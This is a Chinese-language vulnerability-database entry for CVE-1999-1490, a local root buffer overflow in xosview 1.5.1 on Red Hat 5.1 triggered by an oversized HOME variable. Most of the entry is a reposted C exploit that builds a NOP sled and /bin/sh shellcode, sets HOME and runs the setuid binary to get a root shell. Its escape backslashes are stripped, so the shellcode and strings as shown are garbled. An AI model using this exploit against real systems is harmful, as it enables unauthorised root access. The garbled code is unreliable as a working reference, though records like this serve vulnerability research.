Red Hat xosview获得根访问漏洞

Red Hat xosview获得根访问漏洞

漏洞ID 1105463 漏洞类型 未知
发布时间 1999-05-28 更新时间 2005-05-02
图片[1]-Red Hat xosview获得根访问漏洞-安全小百科CVE编号 CVE-1999-1490
图片[2]-Red Hat xosview获得根访问漏洞-安全小百科CNNVD-ID CNNVD-199805-017
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19281
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199805-017
|漏洞详情
RedHat5.1版本的xosview1.5.1版本中存在漏洞,本地用户借助一个长HOME环境变量获得根访问权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/362/info


xosview is an X11 system monitoring application that ships with RedHat 5.1 installed setuid root. A buffer overflow vulnerability was found in Xrm.cc, the offending code listed below:

char userrfilename[1024];

strcpy(userrfilename, getenv("HOME"));

The userfilename can be overflowed and arbritrary code executed to gain root access locally. 

* xosview 1.5.1 buffer overrun exploit

* brought to you by Kossak ([email protected])

*

* yep, this is a shameless rip from Aleph's tutorials, but it sure

* works... Lets keep those exploits coming!! :)

* Thanks to Chris Evans for posting the bug.

*/

/* NOTE!!! xosview needs an open X display for this to work, so remember

* to modify the source (line 62), with your ip.

* The offset and buffer size work with me fine, but you might need to

* change them.

*/

#include <stdlib.h>

#define DEFAULT_OFFSET 1150

#define DEFAULT_BUFFER_SIZE 3500

#define NOP 0x90

char shellcode[] =

"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"

"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"

"x80xe8xdcxffxffxff/bin/sh";

unsigned long get_sp(void) {

__asm__("movl %esp,%eax");

}

void main(int argc, char *argv[]) {

char *buff, *ptr;

long *addr_ptr, addr;

int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;

int i;

if (!(buff = malloc(bsize))) {

printf("Can't allocate memory.n");

exit(0);

}

addr = get_sp() - offset;

printf("xosview exploit by Kossakn");

printf("try changing the default values if you dont get root now.n");

printf("Using address: 0x%xn", addr);

ptr = buff;

addr_ptr = (long *) ptr;

for (i = 0; i < bsize; i+=4)

*(addr_ptr++) = addr;

for (i = 0; i < bsize/2; i++)

buff[i] = NOP;

ptr = buff + ((bsize/2) - (strlen(shellcode)/2));

for (i = 0; i < strlen(shellcode); i++)

*(ptr++) = shellcode[i];

buff[bsize - 1] = '';

setenv("HOME", buff, 1);

system("/usr/bin/X11/xosview -display 0:0"); /* your IP here */

}
|参考资料

来源:BID
名称:362
链接:http://www.securityfocus.com/bid/362
来源:BUGTRAQ
名称:19980528ALERT:Tiresomesecurityholein”xosview”,RedHat5.1?
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=90221101926021&w;=2
来源:XF
名称:linux-xosview-bo(8787)
链接:http://www.iss.net/security_center/static/8787.php
来源:BUGTRAQ
名称:19980529Re:Tiresomesecurityholein”xosview”(xosexp.c)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=90221101926034&w;=2

相关推荐: Microsoft Index Server Webhits.dll ASP Source Disclosure Vulnerability

Microsoft Index Server Webhits.dll ASP Source Disclosure Vulnerability 漏洞ID 1104279 漏洞类型 Input Validation Error 发布时间 2000-03-31 更新…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享